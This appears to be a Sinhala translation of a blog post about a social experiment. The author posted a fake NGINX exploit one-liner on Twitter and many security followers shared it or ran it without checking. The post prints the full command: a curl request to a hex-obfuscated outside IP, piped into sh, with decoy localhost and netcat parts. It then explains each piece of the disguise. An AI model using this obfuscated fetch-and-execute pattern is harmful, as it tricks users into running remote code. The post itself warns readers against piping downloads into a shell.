ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය

සටහන. පරිවර්තනය.: කතෘ ජූනි 1 දින ප්‍රකාශයට පත් කරන ලද මුල් සටහන, තොරතුරු සුරක්ෂිතතාව ගැන උනන්දුවක් දක්වන අය අතර අත්හදා බැලීමක් කිරීමට තීරණය කළේය. මෙය සිදු කිරීම සඳහා, ඔහු වෙබ් සේවාදායකයේ අනාවරණය නොකළ අවදානමක් සඳහා ව්‍යාජ සූරාකෑමක් සකස් කර එය ඔහුගේ ට්විටර් හි පළ කළේය. ඔහුගේ උපකල්පන - කේතයේ පැහැදිලි රැවටිල්ලක් දකින විශේෂඥයින් විසින් ක්ෂණිකව හෙළිදරව් කිරීම - සැබෑ වූවා පමණක් නොව ... ඔවුන් සියලු අපේක්ෂාවන් ඉක්මවා ගිය අතර ප්රතිවිරුද්ධ දිශාවට: ට්වීට් නොකළ බොහෝ පුද්ගලයින්ගෙන් විශාල සහයෝගයක් ලැබුණි. එහි අන්තර්ගතය පරීක්ෂා කරන්න.

ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය

TL;DR: කිසිම තත්වයක් යටතේ sh හෝ bash හි ගොනු නල මාර්ග භාවිතා නොකරන්න. ඔබේ පරිගණකයේ පාලනය නැති කර ගැනීමට මෙය හොඳ ක්‍රමයකි.

මැයි 31 වන දින නිර්මාණය කරන ලද විකට PoC සූරාකෑමක් පිළිබඳ කෙටි කතාවක් ඔබ සමඟ බෙදා ගැනීමට මට අවශ්‍යය. වෙතින් ලැබෙන ප්‍රවෘත්ති වලට ප්‍රතිචාර වශයෙන් ඔහු වහාම පෙනී සිටියේය Alisa Esage Shevchenko, සාමාජික ශුන්‍ය දින මුලපිරීම (ZDI), RCE (දුරස්ථ කේත ක්‍රියාත්මක කිරීම) වෙත NGINX හි අවදානමක් පිළිබඳ තොරතුරු ඉක්මනින් අනාවරණය වනු ඇත. NGINX බොහෝ වෙබ් අඩවි බලගන්වන බැවින්, ප්‍රවෘත්තිය බෝම්බයක් විය යුතුය. නමුත් "වගකිවයුතු හෙළිදරව් කිරීමේ" ක්‍රියාවලියේ ප්‍රමාදයන් නිසා සිදුවූයේ කුමක්ද යන්න පිළිබඳ විස්තර දැන සිටියේ නැත - මෙය සම්මත ZDI ක්‍රියා පටිපාටියයි.

ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය
ට්වීට් කරන්න NGINX හි අවදානම් හෙළිදරව් කිරීම ගැන

curl හි නව අපැහැදිලි තාක්‍ෂණයක් මත වැඩ අවසන් කිරීමෙන් පසු, මම මුල් ට්වීට් එක උපුටා දක්වමින් සොයාගත් අවදානම ගසාකන බව කියන තනි කේත පේළියකින් සමන්විත “ක්‍රියාකාරී PoC කාන්දු කළා”. ඇත්ත වශයෙන්ම, මෙය සම්පූර්ණ විකාරයක් විය. මම උපකල්පනය කළේ මා වහාම නිරාවරණය වනු ඇති බවත්, හොඳම දෙය නම් මට නැවත ට්වීට් කිහිපයක් ලැබෙනු ඇති බවත්ය (අනේ හොඳයි).

ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය
ට්වීට් කරන්න ව්යාජ සූරාකෑම සමඟ

කෙසේ වෙතත්, ඊළඟට සිදුවූයේ කුමක්දැයි මට සිතාගත නොහැකි විය. මගේ ට්වීට් ජනප්‍රියත්වය ඉහළ ගියා. පුදුමයට කරුණක් නම්, මේ මොහොතේ (15:00 මොස්කව් වේලාව ජුනි 1) මෙය ව්‍යාජ එකක් බව ස්වල්ප දෙනෙක් වටහාගෙන ඇත. බොහෝ අය එය කිසිසේත් පරීක්ෂා නොකර එය නැවත ට්වීට් කරයි (එය ප්‍රතිදානය කරන සුන්දර ASCII ග්‍රැෆික්ස් අගය කිරීම හැර).

ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය
එය කෙතරම් අලංකාරදැයි බලන්න!

මෙම සියලු ලූප සහ වර්ණ විශිෂ්ට වුවත්, ඒවා බැලීමට මිනිසුන්ට ඔවුන්ගේ යන්ත්‍රයේ කේතය ධාවනය කිරීමට සිදු වූ බව පැහැදිලිය. වාසනාවකට මෙන්, බ්‍රව්සර් එකම ආකාරයකින් ක්‍රියා කරයි, සහ මට නීතිමය ගැටලුවකට පැටලීමට අවශ්‍ය නොවීම සමඟ ඒකාබද්ධව, මගේ වෙබ් අඩවියේ තැන්පත් කර ඇති කේතය කිසිදු අමතර කේතයක් ස්ථාපනය කිරීමට හෝ ක්‍රියාත්මක කිරීමට උත්සාහ නොකර echo ඇමතුම් ලබා දෙමින් සිටියේය.

කුඩා අපගමනය: netspooky, dnz, මම සහ කණ්ඩායමේ අනෙක් අය මැර පිරිසක් අපි දැන් කාලෙක ඉඳන් curl commands අපැහැදිලි කරන්න විවිධ ක්‍රම එක්ක සෙල්ලම් කරනවා මොකද ඒක නියමයි... අපි ගීක්. netspooky සහ dnz විසින් මට අතිශයින් බලාපොරොත්තු විය හැකි නව ක්‍රම කිහිපයක් සොයා ගන්නා ලදී. මම විනෝදයට එක් වූ අතර උපක්‍රම මල්ලට IP දශම පරිවර්තන එක් කිරීමට උත්සාහ කළෙමි. IP ෂඩාස්රාකාර ආකෘතියට ද පරිවර්තනය කළ හැකි බව පෙනේ. එපමනක් නොව, curl සහ අනෙකුත් බොහෝ NIX මෙවලම් ෂඩාස්රාකාර IPs සතුටින් අනුභව කරයි! එබැවින් එය ඒත්තු ගැන්වෙන සහ ආරක්ෂිත පෙනුමක් ඇති විධාන රේඛාවක් නිර්මාණය කිරීම පමණක් විය. අවසානයේදී මම මෙය තීරණය කළෙමි:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

සමාජ-ඉලෙක්ට්‍රොනික ඉංජිනේරු විද්‍යාව (SEE) - තතුබෑම් වලට වඩා වැඩි යමක්

මෙම අත්හදා බැලීමේ ප්‍රධාන අංගයක් වූයේ ආරක්ෂාව සහ හුරුපුරුදුකමයි. මම හිතන්නේ ඒවා තමයි ඔහුගේ සාර්ථකත්වයට හේතු වුණේ. "127.0.0.1" (සුප්‍රසිද්ධ දේශීය සත්කාරක) වෙත යොමු කිරීම මගින් විධාන රේඛාව පැහැදිලිවම ආරක්ෂාව ඇඟවුම් කරයි. Localhost ආරක්ෂිත ලෙස සලකනු ලබන අතර එහි ඇති දත්ත කිසිවිටෙක ඔබේ පරිගණකයෙන් ඉවත් නොවේ.

හුරුපුරුදුකම අත්හදා බැලීමේ දෙවන ප්‍රධාන SEE සංරචකය විය. ඉලක්කගත ප්‍රේක්ෂකයින් මූලික වශයෙන් පරිගණක ආරක්ෂාව පිළිබඳ මූලික කරුණු හුරුපුරුදු පුද්ගලයින්ගෙන් සමන්විත වූ බැවින්, එහි කොටස් හුරුපුරුදු සහ හුරුපුරුදු (සහ එබැවින් ආරක්ෂිත) ලෙස පෙනෙන පරිදි කේතයක් නිර්මාණය කිරීම වැදගත් විය. පැරණි සූරාකෑමේ සංකල්පවල මූලද්‍රව්‍ය ණයට ගැනීම සහ අසාමාන්‍ය ආකාරයෙන් ඒවා ඒකාබද්ධ කිරීම ඉතා සාර්ථක බව ඔප්පු වී ඇත.

පහත දැක්වෙන්නේ එක්-ලයිනර් පිළිබඳ සවිස්තරාත්මක විශ්ලේෂණයකි. මෙම ලැයිස්තුවේ ඇති සෑම දෙයක්ම පැළඳ සිටී රූපලාවන ස්වභාවය, සහ එහි සැබෑ ක්රියාකාරිත්වය සඳහා ප්රායෝගිකව කිසිවක් අවශ්ය නොවේ.

ඇත්ත වශයෙන්ම අවශ්ය සංරචක මොනවාද? මෙය -gsS, -O 0x0238f06a, |sh සහ වෙබ් සේවාදායකයම. වෙබ් සේවාදායකයේ කිසිදු අනිෂ්ට උපදෙස් අඩංගු නොවීය, නමුත් විධාන භාවිතයෙන් ASCII ග්‍රැෆික්ස් සරලව සේවය කළේය echo හි අඩංගු පිටපතෙහි index.html. පරිශීලකයා සමඟ රේඛාවක් ඇතුළත් කළ විට |sh අතරමැද දී, index.html පටවා ක්‍රියාත්මක කර ඇත. වාසනාවකට මෙන්, වෙබ් සේවාදායකයේ භාරකරුවන්ට නරක චේතනාවක් නොතිබුණි.

  • ../../../%00 - නාමාවලියෙන් ඔබ්බට යාම නියෝජනය කරයි;
  • ngx_stream_module.so - අහඹු NGINX මොඩියුලයකට මාර්ගය;
  • /bin/sh%00<'protocol:TCP' - අපි දියත් කරනවා යැයි කියනු ලැබේ /bin/sh ඉලක්ක යන්ත්රය මත සහ ප්රතිදානය TCP නාලිකාව වෙත හරවා යැවීම;
  • -O 0x0238f06a#PLToffset - රහස් අමුද්රව්ය, පරිපූරක #PLToffset, PLT හි කෙසේ හෝ අඩංගු මතක ඕෆ්සෙට් එකක් ලෙස පෙනෙන්නට;
  • |sh; - තවත් වැදගත් කොටසක්. හි පිහිටා ඇති ප්‍රහාරක වෙබ් සේවාදායකයෙන් එන කේතය ක්‍රියාත්මක කිරීම සඳහා අපට ප්‍රතිදානය sh/bash වෙත හරවා යැවීමට අවශ්‍ය විය. 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - නෙට්කැට් සඳහන් කරන ව්යාජ එකක් /dev/tcp/localhostඑවිට සෑම දෙයක්ම නැවත ආරක්ෂිතව පෙනේ. ඇත්ත වශයෙන්ම, එය කිසිවක් නොකරන අතර අලංකාරය සඳහා පේළියට ඇතුළත් වේ.

මෙය එක් පේළියේ පිටපත විකේතනය කිරීම සහ "සමාජ-ඉලෙක්ට්‍රොනික ඉංජිනේරු" (සංකීර්ණ තතුබෑම්) යන අංශ පිළිබඳ සාකච්ඡාව අවසන් කරයි.

වෙබ් සේවාදායක වින්‍යාසය සහ ප්‍රතිවිරෝධතා

මගේ ග්‍රාහකයින්ගෙන් අතිමහත් බහුතරය infosec/hackers වන බැවින්, ඔවුන්ගේ පැත්තෙන් “උනන්දුව” ප්‍රකාශ කිරීමට වෙබ් සේවාදායකය මඳක් ප්‍රතිරෝධී කිරීමට මම තීරණය කළෙමි, එවිට පිරිමින්ට යමක් කිරීමට සිදුවනු ඇත (එය විනෝදජනක වනු ඇත. සැලසුම). අත්හදා බැලීම තවමත් සිදුවෙමින් පවතින බැවින් මම මෙහි සියලු අන්තරායන් ලැයිස්තුගත කිරීමට යන්නේ නැත, නමුත් සේවාදායකය විසින් කරන දේවල් කිහිපයක් මෙන්න:

  • ඇතැම් සමාජ ජාල වල බෙදාහැරීමේ උත්සාහයන් ක්‍රියාකාරීව අධීක්ෂණය කරන අතර සබැඳිය ක්ලික් කිරීමට පරිශීලකයා දිරිමත් කිරීමට විවිධ පෙරදසුන් සිඟිති රූ ආදේශ කරයි.
  • Shell පිටපත පෙන්වීම වෙනුවට Thugcrowd ප්‍රවර්ධන වීඩියෝව වෙත Chrome/Mozilla/Safari/etc යළි-යොමු කරයි.
  • අනවසරයෙන් ඇතුළුවීම / අමූලික අනවසරයෙන් ඇතුළුවීමේ පැහැදිලි සලකුණු සඳහා ඔරලෝසු, පසුව NSA සේවාදායකයන් වෙත ඉල්ලීම් යළි හරවා යැවීම ආරම්භ කරයි (ha!).
  • සාමාන්‍ය බ්‍රවුසරයකින් ධාරකයට පිවිසෙන සියලුම පරිගණකවල ට්‍රෝජන්, මෙන්ම BIOS රූට්කිට් ස්ථාපනය කරයි (විහිළුවකට!).

ව්‍යාජ nginx සූරාකෑමක් සහිත සමාජ අත්හදා බැලීමක සාර්ථකත්වය
ඇන්ටිමර් වල කුඩා කොටසක්

මෙම අවස්ථාවේ දී, මගේ එකම ඉලක්කය වූයේ Apache හි සමහර විශේෂාංග ප්‍රගුණ කිරීම - විශේෂයෙන්, ඉල්ලීම් යළි හරවා යැවීම සඳහා වන සිසිල් නීති - සහ මම සිතුවෙමි: ඇයි නැත්තේ?

NGINX Exploit (සැබෑ!)

වෙත දායක වන්න @alisaesage Twitter හි සහ NGINX හි සැබෑ දුර්වලතා ආමන්ත්‍රණය කිරීමට සහ අවස්ථාවන් ප්‍රයෝජනයට ගැනීමට ZDI හි විශිෂ්ට කාර්යය අනුගමනය කරන්න. ඔවුන්ගේ කාර්යය සැමවිටම මා සිත්ගත් අතර මගේ මෝඩ ට්වීට් එක නිසා ඇති වූ සියලු සඳහන් කිරීම් සහ දැනුම්දීම් සමඟ ඉවසීමෙන් කටයුතු කිරීම ගැන මම ඇලිස්ට කෘතඥ වෙනවා. වාසනාවකට මෙන්, එය යම් ප්‍රයෝජනයක් ද කළේය: එය NGINX දුර්වලතා මෙන්ම curl අපයෝජනය හේතුවෙන් ඇති වූ ගැටළු පිළිබඳව දැනුවත් කිරීමට උපකාරී විය.

මූලාශ්රය: www.habr.com

අදහස් එක් කරන්න